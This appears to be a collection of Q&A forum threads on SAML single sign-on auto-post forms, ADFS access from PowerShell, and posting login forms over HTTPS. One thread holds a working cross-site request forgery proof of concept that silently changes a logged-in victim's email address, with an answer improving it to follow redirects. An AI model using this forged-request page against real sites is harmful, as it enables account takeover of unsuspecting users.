Passing RelayState between PingFederate(IDP) OpenAM (SP) with Sp-initiated sso - single-sign-on

I have successfully configured SAML SSO with OpenAM as SP and PingFederate as IDP with SP-Initiated SSO and using Redirect-Post binding. I am using kerberos adapter for implementing SSO.
However I cannot pass RelayState parameter from OpenAM to PF and get it back as part of SAML auto post form after successful authentication. It always redirects to OpenAM Assertion Processing Service i.e. openam/metalias/sp
Things I tried -
SAML authentication and custom redirect URL
SSO - SAML, Redirect a user to a specified landing page after successful log in
I created binding in Idp in attributes mapping with name "RelayState" but it appears as part of signed SAMLResponse and not extra parameter in the auto post back form, so openam is not able to get RelayState.
I also tried passing RelayState as url-encoded as well as passing it with name TargetResource. But no luck.
<!-- template name: form.autopost.template.html -->
#set( $messageKeyPrefix = "form.autopost.template." )
<html>
<head>
<title>$templateMessages.getMessage($messageKeyPrefix, "title")</title>
<meta name="referrer" content="origin"/>
<meta http-equiv="x-ua-compatible" content="IE=edge" />
</head>
<body onload="javascript:document.forms[0].submit()">
<noscript>
<p>
<strong>$templateMessages.getMessage($messageKeyPrefix, "noteTitle"):</strong> $templateMessages.getMessage($messageKeyPrefix, "note")
</p>
</noscript>
<form method="post" action="$action">
#foreach( $name in $formControls.keySet() )
<input type="hidden" name="$escape.escape($name)" value="$escape.escape($formControls.get($name))"/>
#end
<input type="hidden" name="RelayState" value="https://www.google.com"/>
<noscript><input type="submit" value="$templateMessages.getMessage($messageKeyPrefix, "resume")"/></noscript>
</form>
</body>
</html>
I out of curiosity modified pingfederate autopost form to foce include RelayState parameter and it it worked.
So I need to find a way where I can pass this information to PF and PF can then pass it back to SP-OpenAM after authentication done adding extra parameter to SAMLResponse form.

Using 'saml2/jsp/spSSOInit.jsp' instead of SAML2 authentication module URL solved this issue.

Related

SAMLResponse generated but not posted to SP ACS

Using CA SiteMinder for implementing SAML solution. SP init flow is being tested. But the browser display is stuck on login page where creds are entered but on background authentication is successful and xhtml form with SAMLResponse inside in it (verified on browser DEV tools) is generated. JavaScript is already enabled on the browser. Logs are not helpful as the SAMLResponse is generated successfully. The below is the form seen on browser DEV tools. I modified the SAMLResponse. The behaviour is same on IE browser too. Is it the problem of UI not being able to understand/process XHTML? Please suggest how this can be solved.
<html>
<HEAD><META HTTP-EQUIV='PRAGMA' CONTENT='NO-CACHE'><META HTTP-EQUIV='CACHE-CONTROL' CONTENT='NO-CACHE'><TITLE>SAML 2.0 Auto-POST form</TITLE></HEAD>
<body onLoad="document.forms[0].submit()">
<NOSCRIPT>Your browser does not support JavaScript. Please click the 'Continue' button below to proceed. <br><br></NOSCRIPT>
<form action="https://agiledev-groupncs.msappproxy.net/IdP/SSO.aspx" method="POST">
<input type="hidden" name="SAMLResponse" value="JpYnV0ZVZhbHVlPgogICAgICAgICAgICA8L25zMjpBdHRyaWJ1dGU+CiAgICAgICPC9uczI6QXNzZXJ0aW9uPgo8L1Jlc3BvbnNlPg==">
<NOSCRIPT><INPUT TYPE="SUBMIT" VALUE="Continue"></NOSCRIPT>
</form>
</body>
</html>

Unable to acccess web API using powershell for ADFS authentication

I am trying to fetch the data from a site. When i log in with a browser it is redirecting me to adfs.sts.com then redirecting to the site automatically.
When i am trying to connect to same site with powershell it is giving below error:
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
</head>
<body onload="document.forms[0].submit()">
<noscript>
<p>
<strong>Note:</strong> Since your browser does not support JavaScript,
you must press the Continue button once to proceed.
</p>
</noscript>
<form action="https://sts.lseg.com/adfs/ls/" method="post">
<div>
It is also opening browser when the Invoke-Webrequest is being called.
Can you please assist how to connect to such sites with powershell where ADFS authentication.

My CSRF PoC doesn't work, the request of csrf get 302 error!! Can anyone help me

I have made a CSRF PoC :
<html>
<head>
<title>CSRF Demo</title>
</head>
<body>
<form action="https://website.com" method="POST">
<input type="hidden" name="utf8" value="✓">
<input type="hidden" name="email_address[name]" value="hacker">
<input type="hidden" name="email_address[address]" value="hacker0ne#gmail.com">
<input type="submit" value="submit">
</form>
</body>
</html>
But when I run code, it doesn't work! I have check for the request and I found that request have status code : 302
Can anyone tell me why it happen and how to fix it!!!Thanks!!!(Sorry if bad English)
Status code 302 is a 3xx code: this is the family of redirect status codes. More precisely, status code 302 denotes that the resource was temporarily moved from the requested URL to another URL.
This status code was introduced in the HTTP 1.0 specification, and is replaced by status code 303 in the HTTP 1.1 specification.
When getting an HTTP response with status code 302, you will also get back a Location header with an URL as its value: this is the URL where you are redirected. Most browsers do this automatically, issuing an identical request to the new URL, but depending on your tool this may not be the case.
In this case, I assume your CSRF works as follows:
You create a fake webpage with the HTML code above, which hides the form fields.
You bait an unsuspecting user into visiting this webpage, hoping he is logged in.
The form is submitted to the URL with the logged in user's cookie (session ID or whatnot), unbeknownst to the user, thus executing the malicious action with the parameters which you control on behalf of the user.
The problem is here that you are sending the form to an URL which gives you back another URL, which is where you should send the form. However, the request must come from the user's browser, so as to send his cookie.
One way of fixing this would be to figure out if the redirect URL is always the same, and hardcode this URL into your form instead of the original one.
Another way, which is safer, would be to recover this URL programmatically (for example with an XHR getResponseHeader) and then send the request to the redirect URL.
The latter way could be implemented as follows:
<html>
<head>
<title>CSRF Demo</title>
</head>
<body>
<form id="malicious" action="https://website.com" method="POST">
<input type="hidden" name="utf8" value="✓">
<input type="hidden" name="email_address[name]" value="hacker">
<input type="hidden" name="email_address[address]" value="hacker0ne#gmail.com">
<input type="submit" value="submit">
</form>
<script>
const XHR = new XMLHttpRequest();
XHR.onreadystatechange = function() {
if (XHR.readyState == 4 && XHR.status == 302) {
// Send the form again to the correct URL
const redirectURL = XHR.getResponseHeader("Location");
document.getElementById("malicious").setAttribute("action", redirectURL);
}
}
// Get the redirect URL
XHR.open("POST", "https://website.com");
XHR.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XHR.send("utf8=✓&email_address[name]=hacker&email_address[address]=hacker0ne#gmail.com");
</script>
</body>
</html>
I tested this implementation with httpstat, which generates responses with the status code you want. When the user presses the submit button, the form should be submitted to the correct URL. This does assume that you are indeed getting the 302 code and the browser/tool does not perform an automatic redirect!

How the IdP know the name of the variable that contain the authnRequest

I implement an saml identity provider,
The servise provider send an HTML from that containt the authnRequest in an hide input, that have a name for example SAMLRequest.
<form id="samlRequestId" action="http://localhost:8084/IdentityProvider/SSOService" method="post">
<input type="hidden" name="RelayState" value="token" />
<input type="hidden" name="SAMLRequest" value="samlRequestValue"</input>
</form>
But how the IdP know this name(SAMLRquest), actually I hard coded this name, I ask if there are any other method?
The attribute name "SAMLRequest" is defined as part of the SAML 2.0 standard. You can find more details about it in http://docs.oasis-open.org/security/saml/v2.0/saml-bindings-2.0-os.pdf, it's in chapter 3.4 HTTP Redirect Binding.

How to send passwords using https?

Facebook currently uses HTTPS whenever your password is sent to us
So when I go to http://www.facebook.com and click login, they have sent my username and password through https even though I am not on a https connection yet.
Does anyone know how this works?
The form's action is https://www.facebook.com/login.php?login_attempt=1. The page with the login form doesn't need to be https, as it is just used to craft a request to the https page.
Also, since http is stateless, you're not really "on" a connection until the moment you send a request. After you get a response, and the page draws, you are no longer "on" the connection.
When you are creating a form just post it to a https page.
<html>
<body>
<form action="https://mypage.com" method="POST">
<input type="text" name="mytext" />
<input type="submit />
</form>
</body>
</html>
This should work even though you are not a https secured page.